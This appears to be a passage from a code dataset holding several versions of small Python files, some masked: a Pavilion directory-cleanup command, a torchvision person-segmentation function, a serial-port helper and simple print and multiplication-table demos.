file=self.errfile, color=output.RED)\n os.remove((download_dir / download).as_posix())\n if args.verbose:\n output.fprint('Removed download {}'.format(download\n ), file=self.outfile)\n elif args.verbose:\n output.fprint('Skipped download {}'.format(download),\n file=self.outfile)\n except PermissionError as err:\n err = str(err).split(\"'\")\n output.fprint('Permission Error: {} cannot be removed'.\n format(err[1]), file=self.errfile, color=31)\n output.fprint('Removing Builds...', file=self.outfile, color=output\n .GREEN)\n for build in os.listdir(build_dir.as_posix()):\n try:\n build_time = datetime.fromtimestamp(os.path.getmtime((\n build_dir / build).as_posix()))\n if build_time < cutoff_date and build not in dependent_builds:\n shutil.rmtree((build_dir / build).as_posix())\n if args.verbose:\n output.fprint('Removed build {}'.format(build),\n file=self.outfile)\n elif args.verbose:\n output.fprint('Skipped build {}'.format(build), file=\n self.outfile)\n except PermissionError as err:\n err = str(err).split(\"'\")\n output.fprint('Permission Error: {} cannot be removed. '.\n format(err[1]), file=self.errfile, color=31)\n return 0\n\n\ndef get_month_delta(months):\n \"\"\"Turn a number of months in the future into a concrete date.\"\"\"\n today = datetime.today()\n cur_year = today.year\n cur_day = today.day\n cur_month = today.month\n cur_time = today.time\n if cur_month - months <= 0:\n cut_month = (cur_month - months) % 12\n diff_years = (cur_month - months) // 12\n cut_year = cur_year + diff_years\n else:\n cut_month = cur_month - months\n cut_year = cur_year\n try:\n cutoff_date = datetime(cut_year, cut_month, cur_day, cur_time)\n except ValueError:\n last_day = monthrange(cut_year, cut_month)[1]\n cutoff_date = datetime(cut_year, cut_month, last_day, cur_time)\n return cutoff_date\n",
"step-4": "import errno\nimport os\nimport shutil\nfrom calendar import monthrange\nfrom datetime import datetime, timedelta\nfrom pavilion import output\nfrom pavilion import commands\nfrom pavilion.status_file import STATES\nfrom pavilion.test_run import TestRun, TestRunError, TestRunNotFoundError\n\n\nclass CleanCommand(commands.Command):\n \"\"\"Cleans outdated test and series run directories.\"\"\"\n\n def __init__(self):\n super().__init__('clean', 'Clean up Pavilion working directory.',\n short_help='Clean up Pavilion working diretory.')\n\n def _setup_arguments(self, parser):\n parser.add_argument('-v', '--verbose', action='store_true', default\n =False, help='Verbose output.')\n parser.add_argument('--older-than', nargs='+', action='store', help\n =\n 'Set the max age of files to be removed. Can be a date ex:\"Jan 1 2019\" or , or a number of days/weeks ex:\"32 weeks\"'\n )\n\n def run(self, pav_cfg, args):\n \"\"\"Run this command.\"\"\"\n if args.older_than:\n if 'day' in args.older_than or 'days' in args.older_than:\n cutoff_date = datetime.today() - timedelta(days=int(args.\n older_than[0]))\n elif 'week' in args.older_than or 'weeks' in args.older_than:\n cutoff_date = datetime.today() - timedelta(weeks=int(args.\n older_than[0]))\n elif 'month' in args.older_than or 'months' in args.older_than:\n cutoff_date = get_month_delta(int(args.older_than[0]))\n else:\n date = ' '.join(args.older_than)\n try:\n cutoff_date = datetime.strptime(date, '%b %d %Y')\n except (TypeError, ValueError):\n output.fprint('{} is not a valid date.'.format(args.\n older_than), file=self.errfile, color=output.RED)\n return errno.EINVAL\n else:\n cutoff_date = datetime.today()\n tests_dir = pav_cfg.working_dir / 'test_runs'\n series_dir = pav_cfg.working_dir / 'series'\n download_dir = pav_cfg.working_dir / 'downloads'\n build_dir = pav_cfg.working_dir / 'builds'\n dependent_builds = []\n incomplete_tests = []\n output.fprint('Removing Tests...', file=self.outfile, 
color=output.\n GREEN)\n for test in os.listdir(tests_dir.as_posix()):\n test_time = datetime.fromtimestamp(os.path.getmtime((tests_dir /\n test).as_posix()))\n try:\n test_obj = TestRun.load(pav_cfg, int(test))\n status = test_obj.status.current().state\n except (TestRunError, TestRunNotFoundError):\n output.fprint('Removing bad test directory {}'.format(test),\n file=self.outfile)\n shutil.rmtree(tests_dir.as_posix())\n continue\n except PermissionError as err:\n err = str(err).split(\"'\")\n output.fprint('Permission Error: {} cannot be removed'.\n format(err[1]), file=self.errfile, color=31)\n if (test_time < cutoff_date and status != STATES.RUNNING and \n status != STATES.SCHEDULED):\n shutil.rmtree((tests_dir / test).as_posix())\n if args.verbose:\n output.fprint('Removed test {}'.format(test), file=self\n .outfile)\n else:\n if args.verbose:\n output.fprint('Skipped test {}'.format(test), file=self\n .outfile)\n incomplete_tests.append(test)\n dependent_builds.append(test_obj.build_name)\n completed_series = True\n output.fprint('Removing Series...', file=self.outfile, color=output\n .GREEN)\n for series in os.listdir(series_dir.as_posix()):\n try:\n series_time = datetime.fromtimestamp(os.path.getmtime((\n series_dir / series).as_posix()))\n for test in incomplete_tests:\n if os.path.exists((series_dir / series / test).as_posix()):\n completed_series = False\n if series_time < cutoff_date and completed_series:\n shutil.rmtree((series_dir / series).as_posix())\n if args.verbose:\n output.fprint('Removed series {}'.format(series),\n file=self.outfile)\n elif args.verbose:\n output.fprint('Skipped series {}'.format(series), file=\n self.outfile)\n except PermissionError as err:\n err = str(err).split(\"'\")\n output.fprint('Permission Error: {} cannot be removed'.\n format(err[1]), file=self.errfile, color=31)\n output.fprint('Removing Downloads...', file=self.outfile, color=\n output.GREEN)\n for download in os.listdir(download_dir.as_posix()):\n try:\n 
download_time = datetime.fromtimestamp(os.path.getmtime((\n download_dir / download).as_posix()))\n if download_time < cutoff_date:\n try:\n shutil.rmtree((download_dir / download).as_posix())\n except NotADirectoryError:\n output.fprint('{} is not a directory.'.format(\n download), file=self.errfile, color=output.RED)\n os.remove((download_dir / download).as_posix())\n if args.verbose:\n output.fprint('Removed download {}'.format(download\n ), file=self.outfile)\n elif args.verbose:\n output.fprint('Skipped download {}'.format(download),\n file=self.outfile)\n except PermissionError as err:\n err = str(err).split(\"'\")\n output.fprint('Permission Error: {} cannot be removed'.\n format(err[1]), file=self.errfile, color=31)\n output.fprint('Removing Builds...', file=self.outfile, color=output\n .GREEN)\n for build in os.listdir(build_dir.as_posix()):\n try:\n build_time = datetime.fromtimestamp(os.path.getmtime((\n build_dir / build).as_posix()))\n if build_time < cutoff_date and build not in dependent_builds:\n shutil.rmtree((build_dir / build).as_posix())\n if args.verbose:\n output.fprint('Removed build {}'.format(build),\n file=self.outfile)\n elif args.verbose:\n output.fprint('Skipped build {}'.format(build), file=\n self.outfile)\n except PermissionError as err:\n err = str(err).split(\"'\")\n output.fprint('Permission Error: {} cannot be removed. 
'.\n format(err[1]), file=self.errfile, color=31)\n return 0\n\n\ndef get_month_delta(months):\n \"\"\"Turn a number of months in the future into a concrete date.\"\"\"\n today = datetime.today()\n cur_year = today.year\n cur_day = today.day\n cur_month = today.month\n cur_time = today.time\n if cur_month - months <= 0:\n cut_month = (cur_month - months) % 12\n diff_years = (cur_month - months) // 12\n cut_year = cur_year + diff_years\n else:\n cut_month = cur_month - months\n cut_year = cur_year\n try:\n cutoff_date = datetime(cut_year, cut_month, cur_day, cur_time)\n except ValueError:\n last_day = monthrange(cut_year, cut_month)[1]\n cutoff_date = datetime(cut_year, cut_month, last_day, cur_time)\n return cutoff_date\n",
"step-5": "import errno\nimport os\nimport shutil\nfrom calendar import monthrange\nfrom datetime import datetime, timedelta\n\nfrom pavilion import output\nfrom pavilion import commands\nfrom pavilion.status_file import STATES\nfrom pavilion.test_run import TestRun, TestRunError, TestRunNotFoundError\n\n\nclass CleanCommand(commands.Command):\n \"\"\"Cleans outdated test and series run directories.\"\"\"\n\n def __init__(self):\n super().__init__(\n 'clean',\n 'Clean up Pavilion working directory.',\n short_help=\"Clean up Pavilion working diretory.\"\n )\n\n def _setup_arguments(self, parser):\n parser.add_argument(\n '-v', '--verbose', action='store_true', default=False,\n help='Verbose output.'\n )\n parser.add_argument(\n '--older-than', nargs='+', action='store',\n help='Set the max age of files to be removed. Can be a date ex:'\n '\"Jan 1 2019\" or , or a number of days/weeks ex:\"32 weeks\"'\n )\n\n def run(self, pav_cfg, args):\n \"\"\"Run this command.\"\"\"\n\n if args.older_than:\n if 'day' in args.older_than or 'days' in args.older_than:\n cutoff_date = datetime.today() - timedelta(\n days=int(args.older_than[0]))\n elif 'week' in args.older_than or 'weeks' in args.older_than:\n cutoff_date = datetime.today() - timedelta(\n weeks=int(args.older_than[0]))\n elif 'month' in args.older_than or 'months' in args.older_than:\n cutoff_date = get_month_delta(int(args.older_than[0]))\n else:\n date = ' '.join(args.older_than)\n try:\n cutoff_date = datetime.strptime(date, '%b %d %Y')\n except (TypeError, ValueError):\n output.fprint(\"{} is not a valid date.\"\n .format(args.older_than),\n file=self.errfile, color=output.RED)\n return errno.EINVAL\n\n # No cutoff specified, removes everything.\n else:\n cutoff_date = datetime.today()\n\n tests_dir = pav_cfg.working_dir / 'test_runs'\n series_dir = pav_cfg.working_dir / 'series'\n download_dir = pav_cfg.working_dir / 'downloads'\n build_dir = pav_cfg.working_dir / 'builds'\n\n dependent_builds = []\n 
incomplete_tests = []\n # Clean Tests\n output.fprint(\"Removing Tests...\", file=self.outfile,\n color=output.GREEN)\n for test in os.listdir(tests_dir.as_posix()):\n test_time = datetime.fromtimestamp(\n os.path.getmtime((tests_dir / test).as_posix()))\n try:\n test_obj = TestRun.load(pav_cfg, int(test))\n status = test_obj.status.current().state\n except (TestRunError, TestRunNotFoundError):\n output.fprint(\"Removing bad test directory {}\".format(test),\n file=self.outfile)\n shutil.rmtree(tests_dir.as_posix())\n continue\n except PermissionError as err:\n err = str(err).split(\"'\")\n output.fprint(\"Permission Error: {} cannot be removed\"\n .format(err[1]), file=self.errfile, color=31)\n if test_time < cutoff_date and status != STATES.RUNNING \\\n and status != STATES.SCHEDULED:\n shutil.rmtree((tests_dir / test).as_posix())\n if args.verbose:\n output.fprint(\"Removed test {}\".format(test),\n file=self.outfile)\n else:\n if args.verbose:\n output.fprint(\"Skipped test {}\".format(test),\n file=self.outfile)\n incomplete_tests.append(test)\n dependent_builds.append(test_obj.build_name)\n\n # Clean Series\n completed_series = True\n output.fprint(\"Removing Series...\", file=self.outfile,\n color=output.GREEN)\n for series in os.listdir(series_dir.as_posix()):\n try:\n series_time = datetime.fromtimestamp(\n os.path.getmtime((series_dir / series).as_posix()))\n for test in incomplete_tests:\n if os.path.exists((series_dir / series / test).as_posix()):\n completed_series = False\n if series_time < cutoff_date and completed_series:\n shutil.rmtree((series_dir / series).as_posix())\n if args.verbose:\n output.fprint(\"Removed series {}\".format(series),\n file=self.outfile)\n else:\n if args.verbose:\n output.fprint(\"Skipped series {}\".format(series),\n file=self.outfile)\n except PermissionError as err:\n err = str(err).split(\"'\")\n output.fprint(\"Permission Error: {} cannot be removed\"\n .format(err[1]), file=self.errfile, color=31)\n\n # Clean 
Downloads\n output.fprint(\"Removing Downloads...\", file=self.outfile,\n color=output.GREEN)\n for download in os.listdir(download_dir.as_posix()):\n try:\n download_time = datetime.fromtimestamp(\n os.path.getmtime((download_dir / download).as_posix()))\n if download_time < cutoff_date:\n try:\n shutil.rmtree((download_dir / download).as_posix())\n except NotADirectoryError:\n output.fprint(\"{} is not a directory.\".format(download),\n file=self.errfile, color=output.RED)\n os.remove((download_dir / download).as_posix())\n if args.verbose:\n output.fprint(\"Removed download {}\".format(download),\n file=self.outfile)\n else:\n if args.verbose:\n output.fprint(\"Skipped download {}\".format(download),\n file=self.outfile)\n except PermissionError as err:\n err = str(err).split(\"'\")\n output.fprint(\"Permission Error: {} cannot be removed\"\n .format(err[1]), file=self.errfile, color=31)\n\n # Clean Builds\n output.fprint(\"Removing Builds...\", file=self.outfile,\n color=output.GREEN)\n for build in os.listdir(build_dir.as_posix()):\n try:\n build_time = datetime.fromtimestamp(\n os.path.getmtime((build_dir / build).as_posix()))\n if build_time < cutoff_date and build not in dependent_builds:\n shutil.rmtree((build_dir / build).as_posix())\n if args.verbose:\n output.fprint(\"Removed build {}\".format(build),\n file=self.outfile)\n else:\n if args.verbose:\n output.fprint(\"Skipped build {}\".format(build),\n file=self.outfile)\n except PermissionError as err:\n err = str(err).split(\"'\")\n output.fprint(\"Permission Error: {} cannot be removed. 
\"\n .format(err[1]), file=self.errfile, color=31)\n\n return 0\n\n\ndef get_month_delta(months):\n \"\"\"Turn a number of months in the future into a concrete date.\"\"\"\n\n today = datetime.today()\n cur_year = today.year\n cur_day = today.day\n cur_month = today.month\n cur_time = today.time\n\n if cur_month - months <= 0:\n cut_month = (cur_month - months) % 12\n diff_years = (cur_month - months) // 12\n cut_year = cur_year + diff_years\n else:\n cut_month = cur_month - months\n cut_year = cur_year\n\n try:\n cutoff_date = datetime(cut_year, cut_month, cur_day, cur_time)\n except ValueError:\n last_day = monthrange(cut_year, cut_month)[1]\n cutoff_date = datetime(cut_year, cut_month, last_day, cur_time)\n\n return cutoff_date\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
import torch
import numpy as np
import cv2
import torchvision
from PIL import Image
def people_on_image(path_to_image):
    """Segment the image at *path_to_image* with FCN-ResNet50 and return a
    520x520 BGR frame in which detected people are tinted red.

    The returned frame is the class-colour mask blended 60/40 with the
    resized/cropped source image.
    """
    # Pascal VOC palette indexed by class id; every class is white except
    # "person" (index 15), which is pure red.
    color_map = [
        (255, 255, 255),  # background
        (255, 255, 255),  # aeroplane
        (255, 255, 255),  # bicycle
        (255, 255, 255),  # bird
        (255, 255, 255),  # boat
        (255, 255, 255),  # bottle
        (255, 255, 255),  # bus
        (255, 255, 255),  # car
        (255, 255, 255),  # cat
        (255, 255, 255),  # chair
        (255, 255, 255),  # cow
        (255, 255, 255),  # dining table
        (255, 255, 255),  # dog
        (255, 255, 255),  # horse
        (255, 255, 255),  # motorbike
        (255, 0, 0),      # person
        (255, 255, 255),  # potted plant
        (255, 255, 255),  # sheep
        (255, 255, 255),  # sofa
        (255, 255, 255),  # train
        (255, 255, 255),  # tv/monitor
    ]
    # Geometry-only transform shared by the model input and the display
    # copy, so the overlay lines up pixel-for-pixel with the mask.
    crop = torchvision.transforms.Compose([
        torchvision.transforms.Resize(540),
        torchvision.transforms.CenterCrop(520)])
    to_tensor = torchvision.transforms.Compose([
        torchvision.transforms.ToTensor(),
        torchvision.transforms.Normalize(
            (0.485, 0.456, 0.406), (0.229, 0.224, 0.225))])

    model = torchvision.models.segmentation.fcn_resnet50(pretrained=True)
    model.eval()

    pil_image = crop(Image.open(path_to_image).convert('RGB'))
    batch = to_tensor(pil_image).unsqueeze(0)
    with torch.no_grad():  # inference only; skip autograd bookkeeping
        out = model(batch)
    labels = torch.argmax(out['out'].squeeze(), dim=0).detach().cpu().numpy()

    # Vectorised palette lookup replaces the per-class boolean-mask loop,
    # which also rebuilt np.array(color_map) on every iteration and swapped
    # the green/blue palette columns when filling the channel maps.
    palette = np.array(color_map, dtype=np.uint8)
    ready_image = cv2.cvtColor(palette[labels], cv2.COLOR_RGB2BGR)

    # Blend with the cropped source image. The original passed the 4-D
    # normalised tensor to cv2.cvtColor (a runtime error) and discarded
    # cv2.addWeighted's return value, so the blend never took effect.
    display = cv2.cvtColor(np.array(pil_image), cv2.COLOR_RGB2BGR)
    ready_image = cv2.addWeighted(ready_image, 0.6, display, 0.4, 0)
    return ready_image
|
normal
|
{
"blob_id": "2193c97b7f1fcf204007c2528ecc47cbf3c67e81",
"index": 9992,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef people_on_image(path_to_image):\n color_map = [(255, 255, 255), (255, 255, 255), (255, 255, 255), (255, \n 255, 255), (255, 255, 255), (255, 255, 255), (255, 255, 255), (255,\n 255, 255), (255, 255, 255), (255, 255, 255), (255, 255, 255), (255,\n 255, 255), (255, 255, 255), (255, 255, 255), (255, 255, 255), (255,\n 0, 0), (255, 255, 255), (255, 255, 255), (255, 255, 255), (255, 255,\n 255), (255, 255, 255)]\n trans = torchvision.transforms.Compose([torchvision.transforms.Resize(\n 540), torchvision.transforms.CenterCrop(520), torchvision.\n transforms.ToTensor(), torchvision.transforms.Normalize((0.485, \n 0.456, 0.406), (0.229, 0.224, 0.225))])\n model = torchvision.models.segmentation.fcn_resnet50(pretrained=True)\n model.eval()\n image = Image.open(path_to_image)\n image = trans(image)\n image = image.unsqueeze(0)\n out = model(image)\n labels = torch.argmax(out['out'].squeeze(), dim=0).detach().cpu().numpy()\n red_map = np.zeros_like(labels).astype(np.uint8)\n green_map = np.zeros_like(labels).astype(np.uint8)\n blue_map = np.zeros_like(labels).astype(np.uint8)\n for label_num in range(0, len(color_map)):\n index = labels == label_num\n red_map[index] = np.array(color_map)[label_num, 0]\n blue_map[index] = np.array(color_map)[label_num, 1]\n green_map[index] = np.array(color_map)[label_num, 2]\n ready_image = np.stack([red_map, green_map, blue_map], axis=2)\n image = np.array(image)\n image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\n ready_image = cv2.cvtColor(ready_image, cv2.COLOR_RGB2BGR)\n cv2.addWeighted(ready_image, 0.6, image, 0.4, 0)\n return ready_image\n",
"step-3": "import torch\nimport numpy as np\nimport cv2\nimport torchvision\nfrom PIL import Image\n\n\ndef people_on_image(path_to_image):\n color_map = [(255, 255, 255), (255, 255, 255), (255, 255, 255), (255, \n 255, 255), (255, 255, 255), (255, 255, 255), (255, 255, 255), (255,\n 255, 255), (255, 255, 255), (255, 255, 255), (255, 255, 255), (255,\n 255, 255), (255, 255, 255), (255, 255, 255), (255, 255, 255), (255,\n 0, 0), (255, 255, 255), (255, 255, 255), (255, 255, 255), (255, 255,\n 255), (255, 255, 255)]\n trans = torchvision.transforms.Compose([torchvision.transforms.Resize(\n 540), torchvision.transforms.CenterCrop(520), torchvision.\n transforms.ToTensor(), torchvision.transforms.Normalize((0.485, \n 0.456, 0.406), (0.229, 0.224, 0.225))])\n model = torchvision.models.segmentation.fcn_resnet50(pretrained=True)\n model.eval()\n image = Image.open(path_to_image)\n image = trans(image)\n image = image.unsqueeze(0)\n out = model(image)\n labels = torch.argmax(out['out'].squeeze(), dim=0).detach().cpu().numpy()\n red_map = np.zeros_like(labels).astype(np.uint8)\n green_map = np.zeros_like(labels).astype(np.uint8)\n blue_map = np.zeros_like(labels).astype(np.uint8)\n for label_num in range(0, len(color_map)):\n index = labels == label_num\n red_map[index] = np.array(color_map)[label_num, 0]\n blue_map[index] = np.array(color_map)[label_num, 1]\n green_map[index] = np.array(color_map)[label_num, 2]\n ready_image = np.stack([red_map, green_map, blue_map], axis=2)\n image = np.array(image)\n image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\n ready_image = cv2.cvtColor(ready_image, cv2.COLOR_RGB2BGR)\n cv2.addWeighted(ready_image, 0.6, image, 0.4, 0)\n return ready_image\n",
"step-4": "import torch\r\nimport numpy as np\r\nimport cv2\r\nimport torchvision\r\nfrom PIL import Image\r\n\r\n\r\n\r\ndef people_on_image(path_to_image):\r\n\r\n color_map = [\r\n (255, 255, 255), # background\r\n (255, 255, 255), # aeroplane\r\n (255, 255, 255), # bicycle\r\n (255, 255, 255), # bird\r\n (255, 255, 255), # boat\r\n (255, 255, 255), # bottle\r\n (255, 255, 255), # bus\r\n (255, 255, 255), # car\r\n (255, 255, 255), # cat\r\n (255, 255, 255), # chair\r\n (255, 255, 255), # cow\r\n (255, 255, 255), # dining table\r\n (255, 255, 255), # dog\r\n (255, 255, 255), # horse\r\n (255, 255, 255), # motorbike\r\n (255, 0, 0), # person\r\n (255, 255, 255), # potted plant\r\n (255, 255, 255), # sheep\r\n (255, 255, 255), # sofa\r\n (255, 255, 255), # train\r\n (255, 255, 255) # tv/monitor\r\n ]\r\n trans = torchvision.transforms.Compose([\r\n torchvision.transforms.Resize(540),\r\n torchvision.transforms.CenterCrop(520),\r\n torchvision.transforms.ToTensor(),\r\n torchvision.transforms.Normalize(\r\n (0.485, 0.456, 0.406), (0.229, 0.224, 0.225))])\r\n\r\n model = torchvision.models.segmentation.fcn_resnet50(pretrained=True)\r\n model.eval()\r\n\r\n image = Image.open(path_to_image)\r\n image = trans(image)\r\n image = image.unsqueeze(0)\r\n out = model(image)\r\n\r\n labels = torch.argmax(out['out'].squeeze(), dim=0).detach().cpu().numpy()\r\n\r\n red_map = np.zeros_like(labels).astype(np.uint8)\r\n green_map = np.zeros_like(labels).astype(np.uint8)\r\n blue_map = np.zeros_like(labels).astype(np.uint8)\r\n\r\n for label_num in range(0, len(color_map)):\r\n index = labels == label_num\r\n red_map[index] = np.array(color_map)[label_num, 0]\r\n blue_map[index] = np.array(color_map)[label_num, 1]\r\n green_map[index] = np.array(color_map)[label_num, 2]\r\n\r\n ready_image = np.stack([red_map, green_map, blue_map], axis=2)\r\n\r\n image = np.array(image)\r\n image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\r\n ready_image = cv2.cvtColor(ready_image, 
cv2.COLOR_RGB2BGR)\r\n cv2.addWeighted(ready_image, 0.6, image, 0.4, 0)\r\n return ready_image\r\n\r\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import serial
import time
from Files_management import get_mov_parameters,change_mov_parameters
#-------------------------------------------------------------------------------
def create_port():
    """Open the serial port named in the stored movement parameters.

    Returns the open ``serial.Serial`` handle on success; on failure the
    stored parameters are reset to "disabled" and ``False`` is returned.
    """
    port = get_mov_parameters()[1]
    try:
        return serial.Serial(port=port, baudrate=9600, timeout=1)
    except Exception:
        # The original bare ``except:`` also swallowed KeyboardInterrupt
        # and SystemExit; Exception keeps the best-effort behaviour
        # without hiding those.
        print('Open port failed')  # original message had a typo ("failded")
        change_mov_parameters('0', port, '0', '0')
        return False
#-------------------------------------------------------------------------------
def port_status(ser):
    """Return True when the movement serial link is usable.

    An already-open *ser* is usable only if the stored "enabled" flag is
    set; otherwise the port is reopened via ``create_port``.
    """
    if ser.isOpen():
        flag = get_mov_parameters()[0]
        # The original fell through and returned None (falsy) when the
        # flag was off; make the False explicit.
        return flag == '1' or flag == 'True'
    # create_port() never raises: it catches failures itself and returns
    # False, so the original try/except here could not fire and this
    # function wrongly reported True even when reopening failed.
    reopened = create_port()
    if reopened is False:
        # Mirror the original error path: report and disable the stored
        # parameters before giving up.
        print("error opening")
        change_mov_parameters('0', get_mov_parameters()[1], '0', '0')
        return False
    # NOTE(review): the reopened handle is discarded here, as in the
    # original — callers appear to re-create ports per operation; confirm.
    return True
#-------------------------------------------------------------------------------
def close_port(ser):
    """Release the serial connection held by *ser*."""
    ser.close()
#-------------------------------------------------------------------------------
def send_value(value):
    """Transmit *value* over the movement serial link when it is enabled."""
    link = create_port()
    enabled = get_mov_parameters()[0]
    if not port_status(link):
        # Link unusable: do nothing, exactly like the original's
        # fall-through (no message is printed in this case).
        return
    if enabled in ('1', 'True'):
        payload = str(value) + ' \n'
        link.write(payload.encode())
        print('True')
    else:
        print('False')
|
normal
|
{
"blob_id": "72cda573bf9c744213a2957d51171f437f211353",
"index": 3467,
"step-1": "<mask token>\n\n\ndef send_value(value):\n port = create_port()\n status = get_mov_parameters()[0]\n if port_status(port):\n if status == '1' or status == 'True':\n string = ''.join([str(value), ' \\n'])\n port.write(string.encode())\n print('True')\n else:\n print('False')\n",
"step-2": "<mask token>\n\n\ndef create_port():\n port = get_mov_parameters()[1]\n try:\n ser = serial.Serial(port=port, baudrate=9600, timeout=1)\n return ser\n except:\n print('Open port failded')\n change_mov_parameters('0', port, '0', '0')\n return False\n\n\ndef port_status(ser):\n if ser.isOpen():\n if get_mov_parameters()[0] == '1' or get_mov_parameters()[0] == 'True':\n return True\n else:\n try:\n create_port()\n return True\n except:\n print('error opening')\n change_mov_parameters('0', get_mov_parameters()[1], '0', '0')\n return False\n\n\n<mask token>\n\n\ndef send_value(value):\n port = create_port()\n status = get_mov_parameters()[0]\n if port_status(port):\n if status == '1' or status == 'True':\n string = ''.join([str(value), ' \\n'])\n port.write(string.encode())\n print('True')\n else:\n print('False')\n",
"step-3": "<mask token>\n\n\ndef create_port():\n port = get_mov_parameters()[1]\n try:\n ser = serial.Serial(port=port, baudrate=9600, timeout=1)\n return ser\n except:\n print('Open port failded')\n change_mov_parameters('0', port, '0', '0')\n return False\n\n\ndef port_status(ser):\n if ser.isOpen():\n if get_mov_parameters()[0] == '1' or get_mov_parameters()[0] == 'True':\n return True\n else:\n try:\n create_port()\n return True\n except:\n print('error opening')\n change_mov_parameters('0', get_mov_parameters()[1], '0', '0')\n return False\n\n\ndef close_port(ser):\n ser.close()\n\n\ndef send_value(value):\n port = create_port()\n status = get_mov_parameters()[0]\n if port_status(port):\n if status == '1' or status == 'True':\n string = ''.join([str(value), ' \\n'])\n port.write(string.encode())\n print('True')\n else:\n print('False')\n",
"step-4": "import serial\nimport time\nfrom Files_management import get_mov_parameters, change_mov_parameters\n\n\ndef create_port():\n port = get_mov_parameters()[1]\n try:\n ser = serial.Serial(port=port, baudrate=9600, timeout=1)\n return ser\n except:\n print('Open port failded')\n change_mov_parameters('0', port, '0', '0')\n return False\n\n\ndef port_status(ser):\n if ser.isOpen():\n if get_mov_parameters()[0] == '1' or get_mov_parameters()[0] == 'True':\n return True\n else:\n try:\n create_port()\n return True\n except:\n print('error opening')\n change_mov_parameters('0', get_mov_parameters()[1], '0', '0')\n return False\n\n\ndef close_port(ser):\n ser.close()\n\n\ndef send_value(value):\n port = create_port()\n status = get_mov_parameters()[0]\n if port_status(port):\n if status == '1' or status == 'True':\n string = ''.join([str(value), ' \\n'])\n port.write(string.encode())\n print('True')\n else:\n print('False')\n",
"step-5": "import serial\nimport time\nfrom Files_management import get_mov_parameters,change_mov_parameters\n\n#-------------------------------------------------------------------------------\ndef create_port():\n port = get_mov_parameters()[1]\n try:\n ser = serial.Serial(port=port,baudrate=9600,timeout=1)\n return ser\n except:\n print('Open port failded')\n change_mov_parameters('0',port,'0','0')\n return False\n\n#-------------------------------------------------------------------------------\ndef port_status(ser):\n if(ser.isOpen()):\n if(get_mov_parameters()[0] == \"1\" or get_mov_parameters()[0] == \"True\"):\n return True\n else: \n try:\n create_port()\n return True\n except:\n print(\"error opening\")\n change_mov_parameters('0',get_mov_parameters()[1],'0','0')\n return False\n\n#-------------------------------------------------------------------------------\ndef close_port(ser):\n ser.close()\n\n#-------------------------------------------------------------------------------\ndef send_value(value):\n port = create_port()\n status = get_mov_parameters()[0]\n if(port_status(port)):\n if(status == '1' or status == 'True'):\n string = \"\".join([str(value),' \\n'])\n port.write(string.encode())\n print('True')\n else :\n print('False')\n \n",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
def func3(a, b):
return
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def func1(a):
print(f'这是有参数的打印:{a}')
<|reserved_special_token_0|>
def func2(a, b):
return a + b
<|reserved_special_token_0|>
def func3(a, b):
return
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def func():
print('这是无参数的打印')
<|reserved_special_token_0|>
def func1(a):
print(f'这是有参数的打印:{a}')
<|reserved_special_token_0|>
def func2(a, b):
return a + b
<|reserved_special_token_0|>
def func3(a, b):
return
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def func():
print('这是无参数的打印')
func()
def func1(a):
print(f'这是有参数的打印:{a}')
func1('有参数a')
def func2(a, b):
return a + b
print(f'有返回值打印:{func2(3, 2)}')
def func3(a, b):
return
print(f'无返回值打印:{func3(3, 2)}')
<|reserved_special_token_1|>
def func():
print("这是无参数的打印")
func()
def func1(a):
print(f"这是有参数的打印:{a}")
func1("有参数a")
def func2(a, b):
return a + b
print(f"有返回值打印:{func2(3, 2)}")
def func3(a, b):
return
print(f"无返回值打印:{func3(3, 2)}")
|
flexible
|
{
"blob_id": "be892250c31198e801836dba24fa8218dd50e811",
"index": 1178,
"step-1": "<mask token>\n\n\ndef func3(a, b):\n return\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef func1(a):\n print(f'这是有参数的打印:{a}')\n\n\n<mask token>\n\n\ndef func2(a, b):\n return a + b\n\n\n<mask token>\n\n\ndef func3(a, b):\n return\n\n\n<mask token>\n",
"step-3": "def func():\n print('这是无参数的打印')\n\n\n<mask token>\n\n\ndef func1(a):\n print(f'这是有参数的打印:{a}')\n\n\n<mask token>\n\n\ndef func2(a, b):\n return a + b\n\n\n<mask token>\n\n\ndef func3(a, b):\n return\n\n\n<mask token>\n",
"step-4": "def func():\n print('这是无参数的打印')\n\n\nfunc()\n\n\ndef func1(a):\n print(f'这是有参数的打印:{a}')\n\n\nfunc1('有参数a')\n\n\ndef func2(a, b):\n return a + b\n\n\nprint(f'有返回值打印:{func2(3, 2)}')\n\n\ndef func3(a, b):\n return\n\n\nprint(f'无返回值打印:{func3(3, 2)}')\n",
"step-5": "def func():\n print(\"这是无参数的打印\")\n\n\nfunc()\n\n\ndef func1(a):\n print(f\"这是有参数的打印:{a}\")\n\n\nfunc1(\"有参数a\")\n\n\ndef func2(a, b):\n return a + b\n\n\nprint(f\"有返回值打印:{func2(3, 2)}\")\n\n\ndef func3(a, b):\n return\n\n\nprint(f\"无返回值打印:{func3(3, 2)}\")\n",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
for i in range(11):
print(n, ' X ', i, ' = ', n * i)
<|reserved_special_token_1|>
n = int(input('please enter the number : '))
for i in range(11):
print(n, ' X ', i, ' = ', n * i)
<|reserved_special_token_1|>
n=int(input("please enter the number : "))
for i in range(11):
print(n," X ",i," = ",n*i)
|
flexible
|
{
"blob_id": "ea4a55ed17c5cc2c6f127112af636ca885159c86",
"index": 5768,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor i in range(11):\n print(n, ' X ', i, ' = ', n * i)\n",
"step-3": "n = int(input('please enter the number : '))\nfor i in range(11):\n print(n, ' X ', i, ' = ', n * i)\n",
"step-4": "n=int(input(\"please enter the number : \"))\nfor i in range(11):\n print(n,\" X \",i,\" = \",n*i)",
